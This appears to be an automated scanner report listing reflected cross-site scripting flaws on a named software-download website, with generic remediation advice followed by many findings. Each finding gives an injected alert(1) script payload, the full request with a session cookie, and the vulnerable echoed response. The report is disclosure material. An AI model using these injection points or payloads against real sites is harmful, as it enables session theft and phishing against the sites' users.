Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://www.x64bitdownload.com/ [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ff09"><script>alert(1)</script>13dc0cda439 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?2ff09"><script>alert(1)</script>13dc0cda439=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:21:55 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:32:37 GMT Cache-Control: max-age=600 Pragma: cache Connection: close Content-Type: text/html; charset=UTF-8 X-Pad: avoid browser bug Content-Length: 64584
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/?2ff09"><script>alert(1)</script>13dc0cda439=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2b79"><script>alert(1)</script>8459f495ec0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-assembling-downloads.htmle2b79"><script>alert(1)</script>8459f495ec0 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:44:51 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:55:01 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 72826
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-assembling-downloads.htmle2b79"><script>alert(1)</script>8459f495ec0" /> ...[SNIP]...
1.3. http://www.x64bitdownload.com/64-bit-assembling-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-assembling-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 634a7"><script>alert(1)</script>8617ba432e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-assembling-downloads.html?634a7"><script>alert(1)</script>8617ba432e=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:40:27 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:50:36 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 72828
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-assembling-downloads.html?634a7"><script>alert(1)</script>8617ba432e=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55aa1"><script>alert(1)</script>7678cf509d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-atom-downloads.html55aa1"><script>alert(1)</script>7678cf509d9 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:58:56 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:09:14 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 89362
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-atom-downloads.html55aa1"><script>alert(1)</script>7678cf509d9" /> ...[SNIP]...
1.5. http://www.x64bitdownload.com/64-bit-atom-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-atom-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8505"><script>alert(1)</script>10d78ca816a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-atom-downloads.html?e8505"><script>alert(1)</script>10d78ca816a=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:52:10 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:02:13 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 89365
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-atom-downloads.html?e8505"><script>alert(1)</script>10d78ca816a=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb3a9"><script>alert(1)</script>d0002961a7e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-audio-downloads.htmlcb3a9"><script>alert(1)</script>d0002961a7e HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:46:08 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:56:54 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 96716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-audio-downloads.htmlcb3a9"><script>alert(1)</script>d0002961a7e" /> ...[SNIP]...
1.7. http://www.x64bitdownload.com/64-bit-audio-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-audio-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7c34"><script>alert(1)</script>baaa57e444b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-audio-downloads.html?c7c34"><script>alert(1)</script>baaa57e444b=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:41:25 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:51:38 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 96719
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-audio-downloads.html?c7c34"><script>alert(1)</script>baaa57e444b=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ccfc"><script>alert(1)</script>7e29c8efc8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-automatic-downloads.html5ccfc"><script>alert(1)</script>7e29c8efc8f HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:45:58 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:56:12 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 90259
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-automatic-downloads.html5ccfc"><script>alert(1)</script>7e29c8efc8f" /> ...[SNIP]...
1.9. http://www.x64bitdownload.com/64-bit-automatic-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-automatic-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85109"><script>alert(1)</script>d22981fa63d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-automatic-downloads.html?85109"><script>alert(1)</script>d22981fa63d=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:43:43 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:53:48 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 90262
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-automatic-downloads.html?85109"><script>alert(1)</script>d22981fa63d=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ba5f"><script>alert(1)</script>cd53e677bcf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-autoposter-downloads.html1ba5f"><script>alert(1)</script>cd53e677bcf HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:42:56 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:53:06 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 36336
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-autoposter-downloads.html1ba5f"><script>alert(1)</script>cd53e677bcf" /> ...[SNIP]...
1.11. http://www.x64bitdownload.com/64-bit-autoposter-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-autoposter-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5be8e"><script>alert(1)</script>09953da3321 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-autoposter-downloads.html?5be8e"><script>alert(1)</script>09953da3321=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:38:26 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:48:26 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 36339
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-autoposter-downloads.html?5be8e"><script>alert(1)</script>09953da3321=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6728"><script>alert(1)</script>d227ac254cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-binaries-downloads.htmla6728"><script>alert(1)</script>d227ac254cf HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:58:24 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:08:47 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 88897
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-binaries-downloads.htmla6728"><script>alert(1)</script>d227ac254cf" /> ...[SNIP]...
1.13. http://www.x64bitdownload.com/64-bit-binaries-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-binaries-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b928f"><script>alert(1)</script>b24ddd27216 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-binaries-downloads.html?b928f"><script>alert(1)</script>b24ddd27216=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:54:07 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:04:23 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 88900
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-binaries-downloads.html?b928f"><script>alert(1)</script>b24ddd27216=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd625"><script>alert(1)</script>5e17d0ba98 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-binary-downloader-downloads.htmlfd625"><script>alert(1)</script>5e17d0ba98 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:58:23 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:08:43 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A17%3A%22binary-downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A17%3A%22binary+downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 35790
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-binary-downloader-downloads.htmlfd625"><script>alert(1)</script>5e17d0ba98" /> ...[SNIP]...
1.15. http://www.x64bitdownload.com/64-bit-binary-downloader-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-binary-downloader-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f33c0"><script>alert(1)</script>a7faec4549f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-binary-downloader-downloads.html?f33c0"><script>alert(1)</script>a7faec4549f=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:55:05 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:05:37 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A17%3A%22binary-downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A17%3A%22binary+downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 35794
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-binary-downloader-downloads.html?f33c0"><script>alert(1)</script>a7faec4549f=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d254"><script>alert(1)</script>67bb66d1da1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-binary-downloads.html6d254"><script>alert(1)</script>67bb66d1da1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
